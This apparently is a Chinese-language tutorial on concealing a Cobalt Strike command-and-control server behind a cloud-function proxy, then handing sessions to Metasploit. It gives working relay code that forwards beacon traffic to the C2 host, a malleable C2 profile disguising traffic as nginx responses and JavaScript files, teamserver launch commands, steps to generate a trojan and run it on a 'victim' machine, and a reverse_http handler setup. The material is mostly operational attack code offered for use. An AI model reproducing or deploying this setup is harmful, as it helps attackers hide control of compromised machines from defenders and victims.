云函数&CS&MSF

一、云函数

1、新建云函数

image-20211029101355697

2、创建自定义模板

image-20211029101717459

3、下滑页面,写入代码

image-20211029101943247

云函数内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# -*- coding: utf8 -*-
import json
import base64
import socket,time
import requests
def main_handler(event, context):
    c2 = "http://服务器ip"
    # event=json.dumps(event)
    path = event['path']
    # # print(path)
    headers = event['headers']
    ip = event['requestContext']['sourceIp']
    # # # # # try:
    headers['X-Forwarded-For'] = ip
   
    if event['httpMethod'] == 'GET':
        resp=requests.get(c2+path,headers=headers,verify=False)
    else:
        resp=requests.post(c2+path,data=event['body'],headers=headers,verify=False)
    response = {
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": str(base64.b64encode(resp.content))[2:-1]
    }
    return response 
#进行测试,返回值error可能存在格式问题。

4、创建API触发器

image-20211029102153774

5、修改API参数长度

image-20220217182030297

修改后发布即可

image-20211029102331066

image-20211029102404624

image-20211029102748778

6、查看API

image-20211029103023818

可以使用80和443两个端口

image-20211029103133988

二、Cobalt Strike

1、创建CS配置文件 cs.profile

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";

http-config {
        set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By";
        header "Server" "Nginx";
        header "Content-Type" "text/html;charset=UTF-8";
        header "Cache-Control" "max-age=1";
        header "Connection" "keep-alive";
        set trust_x_forwarded_for "true";
}
    
http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

2、服务器运行cs服务器

1
./teamserver  服务器IP[和云函数的一致] 密码 cs.profile

3、攻击机运行cs

可以写个shell脚本

1
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar

image-20211029104901511

4、创建监听

image-20211029111712002

5、生成木马

image-20211029111956739

6、受害机运行木马

image-20211029113321079

7、成功上线

image-20211029113811026

8、执行命令获取返回值【成功】

image-20211029114054919

三、CS派生MSF

1、MSF开启监听

1
2
3
4
use exploit/multi/handler
set lhost 192.168.223.137[攻击机IP]
set lport 9999
set payload windows/meterpreter/reverse_http [注意payload要和cs设置的一致]

2、CS创建新的监听器

image-20211029114642961

image-20211029114755031

image-20211029114822858

失败emmmm